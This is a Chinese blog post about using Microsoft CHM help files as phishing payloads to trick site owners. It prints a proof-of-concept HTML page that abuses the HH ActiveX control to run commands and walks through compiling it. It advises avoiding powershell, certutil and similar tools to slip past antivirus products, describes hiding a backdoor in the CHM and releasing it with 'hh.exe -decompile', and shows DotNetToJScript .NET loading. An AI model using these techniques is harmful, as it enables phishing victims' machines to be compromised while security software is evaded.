编程教育资源分享平台

网站首页 > 技术文章 正文

黑客必会的CHM钓鱼操作,你明白了吗?

luoriw 2024-01-17 11:23:38 技术文章 23 ℃ 0 评论

1、CHM钓鱼

进行钓鱼选择合适的payload非常重要,使用一些容易让人放松警惕的文件格式可以大大提高钓鱼的成功率。CHM是微软推出的基于HTML的帮助文件系统,被 IE 浏览器支持的JavaScript, VBScript, ActiveX,等,CHM同样支持。因此使用CHM作为钓鱼的payload非常合适。


上述的总体意思就是,可以让更多站长上当,这里充分了利用到了社会工程学

1) 、使用com控件命令执行

根据@ithurricanept的推特


使用了js启动com控件执行命令

原始码如下:

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>


POC

使用HTML帮助研讨会

创建一个新的项目,添加文件后进行编译


选择新

记住这里千万不要打勾


随便输入记住带.hpp后缀


随便选择一个


然后选择new之后选择HTML文件


然后输入我们刚才的poc


写完之后ctrl + s保存

记住保存的地址



然后点击这个


选择添加把我们刚写的文件添加进去

然后点击ok


随后点击这个


得到地址去访问。发现便执行了命令


利用

实际测试的时候注意了以下几点:

执行命令的时候注意预定的参数与程序名需要用逗号替换,参数与参数之间不需要。

考虑到进行敏感操作会导致杀软提示,因此应避免使用powershell,bitsadmin,certutil,cscript等。

通过cmd执行命令也属于敏感操作,因此使用多个控件依次执行命令。

在搜索的过程中发现.chm文件的替换程序hh.exe具有反编译功能(反编译,将chm返回成html,其实就类似chm可以比喻成一个压缩包,decompile是解压缩)的功能,可以将打包进chm的文件释放出来

HH.EXE -decompile D:/xTemp/decompile-folder C:/xTemp/XMLconvert.chm

hh -decompile目标文件夹源CHM文件名

这句话的意思

因此可以将后门程序一起打包进chm文件中,运行时调用hh.exe释放chm中的后门程序再执行。


测试:

使用360测试的时候效果不太理想,在联网情况下使用hh.exe反编译会被拦截,断网情况下没有问题。

使用火绒测试没有任何拦截。


3、使用js加载.net

既然可以利用chm执行js,那为什么不内嵌.net和dll呢?

POC

编写一个.net dll

namespace ClassLibrary1{    public class Class1    {        public Class1()        {            /* Start notepad */			Process.Start("notepad.exe");        }    }}


生成js脚本

DotNetToJScript.exe -o 1.js ClassLibrary1.dll -c ClassLibrary1.Class1

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表
最新留言